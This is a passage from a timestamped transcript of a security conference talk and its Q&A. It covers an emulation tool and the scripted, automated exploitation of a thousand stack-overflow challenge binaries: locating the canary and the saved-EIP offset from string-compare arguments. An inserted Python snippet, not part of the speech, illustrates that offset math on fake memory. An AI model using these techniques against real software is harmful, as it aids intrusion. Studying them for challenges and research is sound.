00:48:01.045,00:48:04.715 library might link to, so you can follow the library calls 00:48:04.715,00:48:07.351 down into a shared library function and emulate your way 00:48:07.351,00:48:10.755 through those if you wanted to do so, rather than writing all 00:48:10.755,00:48:13.991 the shims for them. Uh, it’s out there on GitHub, it’s out there 00:48:13.991,00:48:17.228 today. Uh, I will push all the latest changes shortly after the 00:48:17.228,00:48:20.264 Con. Uh, but if you’re interested, uh, I’m always 00:48:20.264,00:48:22.867 interested in feedback. If you want to collaborate, I’d love to 00:48:22.867,00:48:27.104 hear from you. 
If you have ideas on features that might make it 00:48:27.104,00:48:29.740 more useful, and you don’t want to implement them, at least 00:48:29.740,00:48:32.309 share them with me and maybe I’ll get around to them or find 00:48:32.309,00:48:37.248 somebody uh, who might like to implement any of your ideas. And 00:48:37.248,00:48:41.018 that’s it. And I’m happy to take any questions, or if not- if no 00:48:41.018,00:48:45.923 question, please enjoy the rest of your conference. [Audience 00:48:45.923,00:48:52.129 applause] Thank you. Uh, do we have microphones somewhere for 00:48:52.129,00:48:54.732 questions? Yeah [mumbles] I’m supposed to direct you to a 00:48:54.732,00:48:58.435 microphone, so it gets picked up. You can come by. You want to 00:48:58.435,00:49:02.373 come up here? >> [Inaudible] >> Microphone is… oh, it’s right 00:49:02.373,00:49:07.678 here. It’s right over here. Drink - don’t forget your drink. 00:49:07.678,00:49:12.983 That’s right. >> [Clears throat] Hello. Uh, a couple of slides 00:49:12.983,00:49:15.619 back, you mentioned uh, two console apple windows… >> That’s 00:49:15.619,00:49:18.022 the wrong way. >> How do you recognize what magic 4 bytes 00:49:18.022,00:49:23.127 overwrite EIP and how do you deal with bad characters? >> Uh, 00:49:23.127,00:49:27.131 when I was doing the scripted demo? So, what I did was in the 00:49:27.131,00:49:30.000 scripted demo, what I had to do is I had to study a couple of 00:49:30.000,00:49:32.403 the binaries manually, right. Not a thousand of them, but I 00:49:32.403,00:49:35.272 looked at two or three of them – looked at the first one and said 00:49:35.272,00:49:37.842 “Well this is clearly an easy stack overflow” I understand 00:49:37.842,00:49:40.411 that if it was just this one exactly how I would exploit it. 00:49:40.411,00:49:42.546 Then I looked at another one and I said: Oh this one is subtly 00:49:42.546,00:49:46.684 different. 
What’s different about it, and can I develop an 00:49:46.684,00:49:50.554 analysis that walks through the program and at certain key 00:49:50.554,00:49:54.525 points in the program picks off certain things for me. Okay, so 00:49:54.525,00:49:56.961 what are the parameters? What is that buffer getting copied? 00:49:56.961,00:50:00.364 Really uh, the string copy- or the string compare gives it all 00:50:00.364,00:50:02.900 away, it tells me the start of the user buffer and the start of 00:50:02.900,00:50:05.836 the canary buffer, and from there what I can do is do some 00:50:05.836,00:50:11.475 math to figure out where say EIP was. Okay, third binary, right – 00:50:11.475,00:50:13.811 all of these things again looking similar, and so I took 00:50:13.811,00:50:16.780 what I learned from looking at three binaries, developed an 00:50:16.780,00:50:19.950 automated process that I would apply to the three binaries and 00:50:19.950,00:50:23.320 then it extended nice and neatly through the thousand binaries, 00:50:23.320,00:50:26.123 which was roughly what they intended. Okay, and what they 00:50:26.123,00:50:29.660 wanted to do was force you to do it quickly. Right, so you 00:50:29.660,00:50:32.796 weren’t going to be able to try to reverse engineer all thousand to 00:50:32.796,00:50:34.465 develop these answers, you wouldn’t have finished in the 00:50:34.465,00:50:37.868 weekend. So I don’t- does that answer your question? >> Yeah, 00:50:37.868,00:50:40.604 yeah. No, I’m assuming that that’s the logic you have to 00:50:40.604,00:50:43.574 hardcode into the program, or does it auto detect that? >>Uh, 00:50:43.574,00:50:46.477 that’s the logic that you have to bake into the script that you 00:50:46.477,00:50:51.548 write. 
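The "math" here can be illustrated against a fake stack snapshot. This sketch assumes a 32-bit cdecl call where the two string compare arguments sit at `[esp]` and `[esp+4]` when the breakpoint on the call is hit, a conventional frame with saved EIP at `ebp+4`, and the user buffer at the lower address of the two. Those are assumptions about the challenge binaries, and every address below is invented; in the real script the values would come from the debugger rather than a byte array.

```python
import struct

def read_u32(mem, base, addr):
    """Read a little-endian 32-bit value from a flat snapshot that starts at `base`."""
    return struct.unpack_from("<I", mem, addr - base)[0]

def read_cstr(mem, base, addr):
    """Read a NUL-terminated byte string from the snapshot."""
    off = addr - base
    return bytes(mem[off:mem.index(b"\x00", off)])

def derive_params(mem, base, esp, ebp):
    """Derive exploit parameters at a breakpoint on the string compare call."""
    a = read_u32(mem, base, esp)       # first argument
    b = read_u32(mem, base, esp + 4)   # second argument
    user_buf, canary_buf = min(a, b), max(a, b)  # assumption: user buffer is lower
    return {
        "canary": read_cstr(mem, base, canary_buf),
        "canary_offset": canary_buf - user_buf,
        "ret_offset": (ebp + 4) - user_buf,  # saved EIP sits just above saved EBP
    }

# Fake snapshot standing in for emulator memory (all addresses hypothetical)
base = 0xBFFFF000
mem = bytearray(0x100)
esp, ebp = base + 0x10, base + 0x78
struct.pack_into("<II", mem, 0x10, base + 0x40, base + 0x60)  # the two arguments
mem[0x60:0x67] = b"s3cr3t\x00"                                # canary contents
params = derive_params(mem, base, esp, ebp)
```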
So, through here, right, are some various things that I 00:50:51.548,00:50:55.352 was looking for, [Inaudible] extracting some register values, 00:50:55.352,00:50:59.023 I’m stepping one instruction at a time, I’m asking you know “Am 00:50:59.023,00:51:01.058 I at certain types of instructions”, I’m counting the 00:51:01.058,00:51:04.862 number of calls, okay, that I’ve encountered, because the third 00:51:04.862,00:51:08.032 call down the chain was going to be the strcpy, and when I got 00:51:08.032,00:51:11.335 to the strcpy - right, or the string compare you can- you can 00:51:11.335,00:51:13.537 see what I’m doing is I’m picking some arguments off the 00:51:13.537,00:51:16.774 stack, right, that have been placed there [Inaudible] passing 00:51:16.774,00:51:20.878 through the string compare and then I- I’m using that to derive 00:51:20.878,00:51:24.081 all the information I need to craft the exploit parameters. >> 00:51:24.081,00:51:27.051 Okay, awesome. Thank you. >> Sure, any other questions? 00:51:27.051,00:51:29.987 You’re trying to get me out of here? I think we’re done. Thanks 00:51:29.987,00:51:32.923 very much. I’d- I’d be happy to talk to you at the side of the 00:51:32.923,00:51:36.260 stage. Thank you. [Audience Applause]